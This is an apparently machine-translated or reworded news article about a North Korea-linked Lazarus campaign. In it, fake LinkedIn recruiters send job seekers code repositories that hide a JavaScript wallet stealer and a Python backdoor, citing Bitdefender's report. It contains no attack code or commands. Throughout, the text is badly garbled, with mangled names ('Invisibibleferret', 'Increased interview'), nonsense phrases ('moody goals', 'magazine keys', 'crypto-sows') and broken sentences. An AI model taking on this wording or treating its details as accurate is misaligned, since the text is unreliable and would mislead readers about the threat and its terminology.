North Korea is linked Group Lazarus was associated with an active company that uses the fake offers of LinkedIn Job in cryptocurrency and travel sectors to deliver malicious software capable of infecting windows, MacOS and Linux Operation Systems.
According to the Bitdefender Cybersecurity Company, the scam begins with a message sent on a professional social media network, which attracts them with the promise of remote work, flexibility for part -time and good payment.
“Once the goal expresses interest, the” hiring process “unfolds, and the fraudster asks a resume or even a personal GitHub repository,” Romanian firm – Note In a report that shared with Hacker News.
“Although it is seemingly innocent, these requests can serve as moody goals, such as harvesting personal data or a loan of legitimacy.”
After receiving the requested details, the attack goes to the next stage when the actor threatens under the guise of a recruiter divides the link to the GitHub or Bitbucket repository, which contains the minimum viable product version (MVP) of the alleged decentralized exchange (DEX) project and instructs the victims to check it and provide their feedback .
The code is present in the code is a clouded scenario that is tuned for a useful load to the next stage with API.Npoint (.) IO crossing JavaScript Information platform, which is able to collect data from various cryptocurrency wallet.
The theft is also doubled as a loader to get the back of the python, responsible for monitoring the changes of the contents of the clipboard, maintain permanent remote access and when additional malware.
At this point, it should be noted that the tactics recorded by Bitdefender are exposed with the famous cluster of attack activity Increased interview . name To abandon the theft of JavaScript called Beavertail and Python implant called Invisibibleferret.
Malicious software expanded with malicious Python software -This binary. In turn, the siphonic data, the magazine keys and the miner of cryptocurrency can.
“The infection of the actors threatens is complex, containing malicious software written in several programming languages, and using different technologies such as multilayered Python scenarios that recurs and perform themselves, theft of JavaScript, which is first and further useful loads and .Net, Based on .Net-based .Net capable of turning off safety tools, set up proxy and launch crypto-sows, “the bitdefer said.
There are data to assume LinkedIn and Redditwith minor settings to the overall attack chain. In some cases, the candidates are asked to clone the Web3 repository and launch it locally as part of the interview process, and in others it was instructed to intentionally introduce errors in the code.
One of the spoken storage bitbucket refers to the project specified “Miketoken_v2“It is no longer available on the hosting code platform.
Discovering information occurs through the day after Sentinelone disclosed What a contagious interview company is used to provide another flexible software for malware.
